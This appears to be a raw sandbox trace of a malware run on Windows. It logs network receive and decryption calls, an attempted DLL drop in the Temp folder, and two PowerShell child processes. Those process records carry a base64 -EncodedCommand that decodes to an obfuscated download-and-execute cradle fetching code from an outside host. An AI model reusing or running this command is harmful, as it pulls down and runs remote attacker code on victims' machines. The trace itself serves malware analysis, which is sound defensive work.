	[0913.479] DecryptMessage (in: phContext=0x1c5bd940, pMessage=0x2f77bd0, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2f77bd0, pfQOP=0x0) returned 0x0
	[0913.479] recv (in: s=0x4b4, buf=0x2f52008, len=5, flags=0 | out: buf=0x2f52008*) returned 5
	[0913.480] recv (in: s=0x4b4, buf=0x2f5200d, len=16416, flags=0 | out: buf=0x2f5200d*) returned 16416
	[0913.480] DecryptMessage (in: phContext=0x1c5bd940, pMessage=0x2f77e10, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2f77e10, pfQOP=0x0) returned 0x0
	[0913.481] recv (in: s=0x4b4, buf=0x2f52008, len=5, flags=0 | out: buf=0x2f52008*) returned 5
	[0913.481] recv (in: s=0x4b4, buf=0x2f5200d, len=16416, flags=0 | out: buf=0x2f5200d*) returned 10618
	[0913.482] recv (in: s=0x4b4, buf=0x2f54987, len=5798, flags=0 | out: buf=0x2f54987*) returned 5798
	[0913.655] DecryptMessage (in: phContext=0x1c5bd940, pMessage=0x2f780a0, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2f780a0, pfQOP=0x0) returned 0x0
	[0913.656] recv (in: s=0x4b4, buf=0x2f52008, len=5, flags=0 | out: buf=0x2f52008*) returned 5
	[0913.656] recv (in: s=0x4b4, buf=0x2f5200d, len=16416, flags=0 | out: buf=0x2f5200d*) returned 2773
	[0913.656] recv (in: s=0x4b4, buf=0x2f52ae2, len=13643, flags=0 | out: buf=0x2f52ae2*) returned 13643
	[0913.845] DecryptMessage (in: phContext=0x1c5bd940, pMessage=0x2f782e0, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2f782e0, pfQOP=0x0) returned 0x0
	[0913.847] recv (in: s=0x4b4, buf=0x2f52008, len=5, flags=0 | out: buf=0x2f52008*) returned 5
	[0913.847] recv (in: s=0x4b4, buf=0x2f5200d, len=16416, flags=0 | out: buf=0x2f5200d*) returned 3504
	[0913.848] recv (in: s=0x4b4, buf=0x2f52dbd, len=12912, flags=0 | out: buf=0x2f52dbd*) returned 12912
	[0914.068] DecryptMessage (in: phContext=0x1c5bd940, pMessage=0x2f78520, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2f78520, pfQOP=0x0) returned 0x0
	[0914.081] recv (in: s=0x4b4, buf=0x2f52008, len=5, flags=0 | out: buf=0x2f52008*) returned 5
	[0914.081] recv (in: s=0x4b4, buf=0x2f5200d, len=16416, flags=0 | out: buf=0x2f5200d*) returned 5843
	[0914.081] recv (in: s=0x4b4, buf=0x2f536e0, len=10573, flags=0 | out: buf=0x2f536e0*) returned 10573
	[0914.379] DecryptMessage (in: phContext=0x1c5bd940, pMessage=0x2f78788, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2f78788, pfQOP=0x0) returned 0x0
	[0914.380] recv (in: s=0x4b4, buf=0x2f52008, len=5, flags=0 | out: buf=0x2f52008*) returned 5
	[0914.380] recv (in: s=0x4b4, buf=0x2f5200d, len=16416, flags=0 | out: buf=0x2f5200d*) returned 1214
	[0914.381] recv (in: s=0x4b4, buf=0x2f524cb, len=15202, flags=0 | out: buf=0x2f524cb*) returned 15202
	[0914.479] DecryptMessage (in: phContext=0x1c5bd940, pMessage=0x2f789c8, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2f789c8, pfQOP=0x0) returned 0x0
	[0914.481] recv (in: s=0x4b4, buf=0x2f52008, len=5, flags=0 | out: buf=0x2f52008*) returned 5
	[0914.481] recv (in: s=0x4b4, buf=0x2f5200d, len=16416, flags=0 | out: buf=0x2f5200d*) returned 2481
	[0914.481] recv (in: s=0x4b4, buf=0x2f529be, len=13935, flags=0 | out: buf=0x2f529be*) returned 13935
	[0914.637] DecryptMessage (in: phContext=0x1c5bd940, pMessage=0x2f78c30, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2f78c30, pfQOP=0x0) returned 0x0
	[0914.638] recv (in: s=0x4b4, buf=0x2f52008, len=5, flags=0 | out: buf=0x2f52008*) returned 1
	[0914.638] recv (in: s=0x4b4, buf=0x2f52009, len=4, flags=0 | out: buf=0x2f52009*) returned 4
	[0914.663] recv (in: s=0x4b4, buf=0x2f5200d, len=16416, flags=0 | out: buf=0x2f5200d*) returned 3212
	[0914.663] recv (in: s=0x4b4, buf=0x2f52c99, len=13204, flags=0 | out: buf=0x2f52c99*) returned 13204
	[0914.751] DecryptMessage (in: phContext=0x1c5bd940, pMessage=0x2f78e70, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2f78e70, pfQOP=0x0) returned 0x0
	[0914.752] recv (in: s=0x4b4, buf=0x2f52008, len=5, flags=0 | out: buf=0x2f52008*) returned 5
	[0914.752] recv (in: s=0x4b4, buf=0x2f5200d, len=16416, flags=0 | out: buf=0x2f5200d*) returned 191
	[0914.752] recv (in: s=0x4b4, buf=0x2f520cc, len=16225, flags=0 | out: buf=0x2f520cc*) returned 16225
	[0915.050] DecryptMessage (in: phContext=0x1c5bd940, pMessage=0x2f790b0, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2f790b0, pfQOP=0x0) returned 0x0
	[0915.054] recv (in: s=0x4b4, buf=0x2f52008, len=5, flags=0 | out: buf=0x2f52008*) returned 5
	[0915.054] recv (in: s=0x4b4, buf=0x2f5200d, len=16416, flags=0 | out: buf=0x2f5200d*) returned 3066
	[0915.054] recv (in: s=0x4b4, buf=0x2f52c07, len=13350, flags=0 | out: buf=0x2f52c07*) returned 13350
	[0915.230] DecryptMessage (in: phContext=0x1c5bd940, pMessage=0x2f79340, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2f79340, pfQOP=0x0) returned 0x0
	[0915.231] recv (in: s=0x4b4, buf=0x2f52008, len=5, flags=0 | out: buf=0x2f52008*) returned 5
	[0915.232] recv (in: s=0x4b4, buf=0x2f5200d, len=16416, flags=0 | out: buf=0x2f5200d*) returned 1117
	[0915.233] recv (in: s=0x4b4, buf=0x2f5246a, len=15299, flags=0 | out: buf=0x2f5246a*) returned 1608
	[0915.233] recv (in: s=0x4b4, buf=0x2f52ab2, len=13691, flags=0 | out: buf=0x2f52ab2*) returned 536
	[0915.233] recv (in: s=0x4b4, buf=0x2f52cca, len=13155, flags=0 | out: buf=0x2f52cca*) returned 13155
	[0916.083] DecryptMessage (in: phContext=0x1c5bd940, pMessage=0x2f79580, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2f79580, pfQOP=0x0) returned 0x0
	[0916.088] recv (in: s=0x4b4, buf=0x2f52008, len=5, flags=0 | out: buf=0x2f52008*) returned 5
	[0916.089] recv (in: s=0x4b4, buf=0x2f5200d, len=16416, flags=0 | out: buf=0x2f5200d*) returned 8280
	[0916.089] recv (in: s=0x4b4, buf=0x2f54065, len=8136, flags=0 | out: buf=0x2f54065*) returned 3472
	[0916.459] recv (in: s=0x4b4, buf=0x2f54df5, len=4664, flags=0 | out: buf=0x2f54df5*) returned 280
	[0916.459] recv (in: s=0x4b4, buf=0x2f54f0d, len=4384, flags=0 | out: buf=0x2f54f0d*) returned 4384
	[0916.871] DecryptMessage (in: phContext=0x1c5bd940, pMessage=0x2f797c0, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2f797c0, pfQOP=0x0) returned 0x0
	[0916.873] recv (in: s=0x4b4, buf=0x2f52008, len=5, flags=0 | out: buf=0x2f52008*) returned 5
	[0916.873] recv (in: s=0x4b4, buf=0x2f5200d, len=16416, flags=0 | out: buf=0x2f5200d*) returned 16416
	[0916.873] DecryptMessage (in: phContext=0x1c5bd940, pMessage=0x2f79a00, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2f79a00, pfQOP=0x0) returned 0x0
	[0916.874] recv (in: s=0x4b4, buf=0x2f52008, len=5, flags=0 | out: buf=0x2f52008*) returned 5
	[0916.874] recv (in: s=0x4b4, buf=0x2f5200d, len=16416, flags=0 | out: buf=0x2f5200d*) returned 16416
	[0916.874] DecryptMessage (in: phContext=0x1c5bd940, pMessage=0x2f79c68, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2f79c68, pfQOP=0x0) returned 0x0
	[0916.875] recv (in: s=0x4b4, buf=0x2f52008, len=5, flags=0 | out: buf=0x2f52008*) returned 5
	[0916.875] recv (in: s=0x4b4, buf=0x2f5200d, len=16416, flags=0 | out: buf=0x2f5200d*) returned 13153
	[0916.876] recv (in: s=0x4b4, buf=0x2f5536e, len=3263, flags=0 | out: buf=0x2f5536e*) returned 3263
	[0916.879] DecryptMessage (in: phContext=0x1c5bd940, pMessage=0x2f79ea8, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2f79ea8, pfQOP=0x0) returned 0x0
	[0916.880] recv (in: s=0x4b4, buf=0x2f52008, len=5, flags=0 | out: buf=0x2f52008*) returned 5
	[0916.880] recv (in: s=0x4b4, buf=0x2f5200d, len=16416, flags=0 | out: buf=0x2f5200d*) returned 2092
	[0916.880] recv (in: s=0x4b4, buf=0x2f52839, len=14324, flags=0 | out: buf=0x2f52839*) returned 3752
	[0917.066] recv (in: s=0x4b4, buf=0x2f536e1, len=10572, flags=0 | out: buf=0x2f536e1*) returned 8576
	[0917.066] recv (in: s=0x4b4, buf=0x2f55861, len=1996, flags=0 | out: buf=0x2f55861*) returned 1996
	[0917.074] DecryptMessage (in: phContext=0x1c5bd940, pMessage=0x2f7a0e8, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2f7a0e8, pfQOP=0x0) returned 0x0
	[0917.076] recv (in: s=0x4b4, buf=0x2f52008, len=5, flags=0 | out: buf=0x2f52008*) returned 5
	[0917.077] recv (in: s=0x4b4, buf=0x2f5200d, len=16416, flags=0 | out: buf=0x2f5200d*) returned 3359
	[0917.078] recv (in: s=0x4b4, buf=0x2f52d2c, len=13057, flags=0 | out: buf=0x2f52d2c*) returned 3216
	[0917.078] recv (in: s=0x4b4, buf=0x2f539bc, len=9841, flags=0 | out: buf=0x2f539bc*) returned 9841
	[0917.739] DecryptMessage (in: phContext=0x1c5bd940, pMessage=0x2f7a328, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2f7a328, pfQOP=0x0) returned 0x0
	[0917.740] recv (in: s=0x4b4, buf=0x2f52008, len=5, flags=0 | out: buf=0x2f52008*) returned 5
	[0917.740] recv (in: s=0x4b4, buf=0x2f5200d, len=16416, flags=0 | out: buf=0x2f5200d*) returned 16416
	[0917.741] DecryptMessage (in: phContext=0x1c5bd940, pMessage=0x2f7a590, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2f7a590, pfQOP=0x0) returned 0x0
	[0917.742] recv (in: s=0x4b4, buf=0x2f52008, len=5, flags=0 | out: buf=0x2f52008*) returned 5
	[0917.743] recv (in: s=0x4b4, buf=0x2f5200d, len=16416, flags=0 | out: buf=0x2f5200d*) returned 2141
	[0917.743] recv (in: s=0x4b4, buf=0x2f5286a, len=14275, flags=0 | out: buf=0x2f5286a*) returned 3472
	[0917.748] recv (in: s=0x4b4, buf=0x2f535fa, len=10803, flags=0 | out: buf=0x2f535fa*) returned 1888
	[0917.748] recv (in: s=0x4b4, buf=0x2f53d5a, len=8915, flags=0 | out: buf=0x2f53d5a*) returned 8915
	[0918.037] DecryptMessage (in: phContext=0x1c5bd940, pMessage=0x2f7a7d0, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2f7a7d0, pfQOP=0x0) returned 0x0
	[0918.038] recv (in: s=0x4b4, buf=0x2f52008, len=5, flags=0 | out: buf=0x2f52008*) returned 5
	[0918.038] recv (in: s=0x4b4, buf=0x2f5200d, len=16416, flags=0 | out: buf=0x2f5200d*) returned 7696
	[0918.038] recv (in: s=0x4b4, buf=0x2f53e1d, len=8720, flags=0 | out: buf=0x2f53e1d*) returned 8720
	[0918.555] DecryptMessage (in: phContext=0x1c5bd940, pMessage=0x2f7aa10, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2f7aa10, pfQOP=0x0) returned 0x0
	[0918.556] recv (in: s=0x4b4, buf=0x2f52008, len=5, flags=0 | out: buf=0x2f52008*) returned 5
	[0918.556] recv (in: s=0x4b4, buf=0x2f5200d, len=16416, flags=0 | out: buf=0x2f5200d*) returned 387
	[0918.556] recv (in: s=0x4b4, buf=0x2f52190, len=16029, flags=0 | out: buf=0x2f52190*) returned 16029
	[0918.754] DecryptMessage (in: phContext=0x1c5bd940, pMessage=0x2f7ac50, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2f7ac50, pfQOP=0x0) returned 0x0
	[0918.755] recv (in: s=0x4b4, buf=0x2f52008, len=5, flags=0 | out: buf=0x2f52008*) returned 5
	[0918.756] recv (in: s=0x4b4, buf=0x2f5200d, len=16416, flags=0 | out: buf=0x2f5200d*) returned 1118
	[0918.756] recv (in: s=0x4b4, buf=0x2f5246b, len=15298, flags=0 | out: buf=0x2f5246b*) returned 15298
	[0918.991] DecryptMessage (in: phContext=0x1c5bd940, pMessage=0x2f7aeb8, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2f7aeb8, pfQOP=0x0) returned 0x0
	[0918.992] recv (in: s=0x4b4, buf=0x2f52008, len=5, flags=0 | out: buf=0x2f52008*) returned 5
	[0918.992] recv (in: s=0x4b4, buf=0x2f5200d, len=16416, flags=0 | out: buf=0x2f5200d*) returned 3457
	[0918.992] recv (in: s=0x4b4, buf=0x2f52d8e, len=12959, flags=0 | out: buf=0x2f52d8e*) returned 12959
	[0920.104] DecryptMessage (in: phContext=0x1c5bd940, pMessage=0x2f7b0f8, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2f7b0f8, pfQOP=0x0) returned 0x0
	[0920.105] recv (in: s=0x4b4, buf=0x2f52008, len=5, flags=0 | out: buf=0x2f52008*) returned 5
	[0920.105] recv (in: s=0x4b4, buf=0x2f5200d, len=16416, flags=0 | out: buf=0x2f5200d*) returned 15980
	[0920.106] recv (in: s=0x4b4, buf=0x2f55e79, len=436, flags=0 | out: buf=0x2f55e79*) returned 436
	[0920.268] DecryptMessage (in: phContext=0x1c5bd940, pMessage=0x2f7b338, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2f7b338, pfQOP=0x0) returned 0x0
	[0920.269] recv (in: s=0x4b4, buf=0x2f52008, len=5, flags=0 | out: buf=0x2f52008*) returned 5
	[0920.269] recv (in: s=0x4b4, buf=0x2f5200d, len=16416, flags=0 | out: buf=0x2f5200d*) returned 2775
	[0920.269] recv (in: s=0x4b4, buf=0x2f52ae4, len=13641, flags=0 | out: buf=0x2f52ae4*) returned 13641
	[0920.637] DecryptMessage (in: phContext=0x1c5bd940, pMessage=0x2f7b578, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2f7b578, pfQOP=0x0) returned 0x0
	[0920.638] recv (in: s=0x4b4, buf=0x2f52008, len=5, flags=0 | out: buf=0x2f52008*) returned 5
	[0920.638] recv (in: s=0x4b4, buf=0x2f5200d, len=16416, flags=0 | out: buf=0x2f5200d*) returned 1362
	[0920.639] recv (in: s=0x4b4, buf=0x2f5255f, len=15054, flags=0 | out: buf=0x2f5255f*) returned 15054
	[0920.910] DecryptMessage (in: phContext=0x1c5bd940, pMessage=0x2f7b808, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2f7b808, pfQOP=0x0) returned 0x0
	[0920.912] recv (in: s=0x4b4, buf=0x2f52008, len=5, flags=0 | out: buf=0x2f52008*) returned 5
	[0920.912] recv (in: s=0x4b4, buf=0x2f5200d, len=16416, flags=0 | out: buf=0x2f5200d*) returned 3701
	[0920.912] recv (in: s=0x4b4, buf=0x2f52e82, len=12715, flags=0 | out: buf=0x2f52e82*) returned 12715
	[0921.343] DecryptMessage (in: phContext=0x1c5bd940, pMessage=0x2f7ba48, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2f7ba48, pfQOP=0x0) returned 0x0
	[0921.344] recv (in: s=0x4b4, buf=0x2f52008, len=5, flags=0 | out: buf=0x2f52008*) returned 5
	[0921.344] recv (in: s=0x4b4, buf=0x2f5200d, len=16416, flags=0 | out: buf=0x2f5200d*) returned 680
	[0921.344] recv (in: s=0x4b4, buf=0x2f522b5, len=15736, flags=0 | out: buf=0x2f522b5*) returned 1072
	[0921.357] recv (in: s=0x4b4, buf=0x2f526e5, len=14664, flags=0 | out: buf=0x2f526e5*) returned 14664
	[0921.730] DecryptMessage (in: phContext=0x1c5bd940, pMessage=0x2f7bc88, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2f7bc88, pfQOP=0x0) returned 0x0
	[0921.731] recv (in: s=0x4b4, buf=0x2f52008, len=5, flags=0 | out: buf=0x2f52008*) returned 5
	[0921.731] recv (in: s=0x4b4, buf=0x2f5200d, len=16416, flags=0 | out: buf=0x2f5200d*) returned 1947
	[0921.731] recv (in: s=0x4b4, buf=0x2f527a8, len=14469, flags=0 | out: buf=0x2f527a8*) returned 14469
	[0921.955] DecryptMessage (in: phContext=0x1c5bd940, pMessage=0x2f7bec8, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2f7bec8, pfQOP=0x0) returned 0x0
	[0921.956] recv (in: s=0x4b4, buf=0x2f52008, len=5, flags=0 | out: buf=0x2f52008*) returned 5
	[0921.956] recv (in: s=0x4b4, buf=0x2f5200d, len=16416, flags=0 | out: buf=0x2f5200d*) returned 5358
	[0921.957] recv (in: s=0x4b4, buf=0x2f534fb, len=11058, flags=0 | out: buf=0x2f534fb*) returned 11058
	[0922.152] DecryptMessage (in: phContext=0x1c5bd940, pMessage=0x2f7c130, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2f7c130, pfQOP=0x0) returned 0x0
	[0922.153] recv (in: s=0x4b4, buf=0x2f52008, len=5, flags=0 | out: buf=0x2f52008*) returned 5
	[0922.153] recv (in: s=0x4b4, buf=0x2f5200d, len=16416, flags=0 | out: buf=0x2f5200d*) returned 2873
	[0922.153] recv (in: s=0x4b4, buf=0x2f52b46, len=13543, flags=0 | out: buf=0x2f52b46*) returned 13543
	[0922.395] DecryptMessage (in: phContext=0x1c5bd940, pMessage=0x2f7c370, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2f7c370, pfQOP=0x0) returned 0x0
	[0922.396] recv (in: s=0x4b4, buf=0x2f52008, len=5, flags=0 | out: buf=0x2f52008*) returned 5
	[0922.396] recv (in: s=0x4b4, buf=0x2f5200d, len=16416, flags=0 | out: buf=0x2f5200d*) returned 388
	[0922.396] recv (in: s=0x4b4, buf=0x2f52191, len=16028, flags=0 | out: buf=0x2f52191*) returned 16028
	[0922.610] DecryptMessage (in: phContext=0x1c5bd940, pMessage=0x2f7c5b0, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2f7c5b0, pfQOP=0x0) returned 0x0
	[0922.610] recv (in: s=0x4b4, buf=0x2f52008, len=5, flags=0 | out: buf=0x2f52008*) returned 5
	[0922.610] recv (in: s=0x4b4, buf=0x2f5200d, len=16416, flags=0 | out: buf=0x2f5200d*) returned 47
	[0922.611] recv (in: s=0x4b4, buf=0x2f5203c, len=16369, flags=0 | out: buf=0x2f5203c*) returned 16369
	[0922.813] DecryptMessage (in: phContext=0x1c5bd940, pMessage=0x2f7c7f0, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2f7c7f0, pfQOP=0x0) returned 0x0
	[0922.813] recv (in: s=0x4b4, buf=0x2f52008, len=5, flags=0 | out: buf=0x2f52008*) returned 5
	[0922.813] recv (in: s=0x4b4, buf=0x2f5200d, len=4736, flags=0 | out: buf=0x2f5200d*) returned 1850
	[0922.814] recv (in: s=0x4b4, buf=0x2f52747, len=2886, flags=0 | out: buf=0x2f52747*) returned 2886
	[0922.895] DecryptMessage (in: phContext=0x1c5bd940, pMessage=0x2f7ca08, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2f7ca08, pfQOP=0x0) returned 0x0
	[0922.900] SetEvent (hEvent=0x354) returned 1
	[0930.512] CoTaskMemAlloc (cb=0x104) returned 0x1b6e4bc0
	[0930.513] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6e4bc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0930.513] CoTaskMemFree (pv=0x1b6e4bc0) 
	[0930.514] CoTaskMemAlloc (cb=0x104) returned 0x1b6e4bc0
	[0930.514] GetEnvironmentVariableW (in: lpName="temp", lpBuffer=0x1b6e4bc0, nSize=0x80 | out: lpBuffer="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp") returned 0x24
	[0930.514] CoTaskMemFree (pv=0x1b6e4bc0) 
	[0930.523] CoTaskMemAlloc (cb=0x104) returned 0x1b6e4bc0
	[0930.523] GetEnvironmentVariableW (in: lpName="temp", lpBuffer=0x1b6e4bc0, nSize=0x80 | out: lpBuffer="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp") returned 0x24
	[0930.523] CoTaskMemFree (pv=0x1b6e4bc0) 
	[0939.401] GetLongPathNameW (in: lpszShortPath="C:\\Users\\5P5NRG~1\\", lpszLongPath=0x1c5bd610, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned 0x1e
	[0939.402] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\vThQexNegi.dll", nBufferLength=0x105, lpBuffer=0x1c5bd690, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\vThQexNegi.dll", lpFilePart=0x0) returned 0x3f
	[0939.402] SetErrorMode (uMode=0x1) returned 0x1
	[0939.402] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\vThQexNegi.dll" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\vthqexnegi.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffffffffffff
	[0954.340] SetErrorMode (uMode=0x1) returned 0x1
	[0954.346] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1c5bafa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0954.346] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1c5baef0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0954.346] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1c5baef0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0954.346] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1c5baef0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0954.379] CoTaskMemAlloc (cb=0x104) returned 0x1b6e4bc0
	[0954.379] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6e4bc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0954.380] CoTaskMemFree (pv=0x1b6e4bc0) 

Thread:
	id = 2005
	os_tid = 0x2744


Thread:
	id = 2013
	os_tid = 0x2764


Thread:
	id = 2018
	os_tid = 0x2778

	[0904.961] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0904.965] ResetEvent (hEvent=0x354) returned 1

Thread:
	id = 2045
	os_tid = 0x27e4


Process:
	id = "82"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x6fd41000"
	os_pid = "0x578"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "19"
	os_parent_pid = "0x5a4"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 370
	os_tid = 0x630


Thread:
	id = 442
	os_tid = 0x10d4


Thread:
	id = 446
	os_tid = 0x10e4


Thread:
	id = 1683
	os_tid = 0x236c


Thread:
	id = 1685
	os_tid = 0x2374


Thread:
	id = 1708
	os_tid = 0x23ec


Thread:
	id = 1787
	os_tid = 0x1cfc


Process:
	id = "83"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x74a73000"
	os_pid = "0x8ac"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "17"
	os_parent_pid = "0x97c"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 375
	os_tid = 0x9f0

	[0827.021] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0838.605] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0838.606] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0838.606] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0838.606] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0914.747] sprintf_s (in: _DstBuf=0x12f178, _DstSize=0x11, _Format="get_%s" | out: _DstBuf="get_MemberType") returned 14
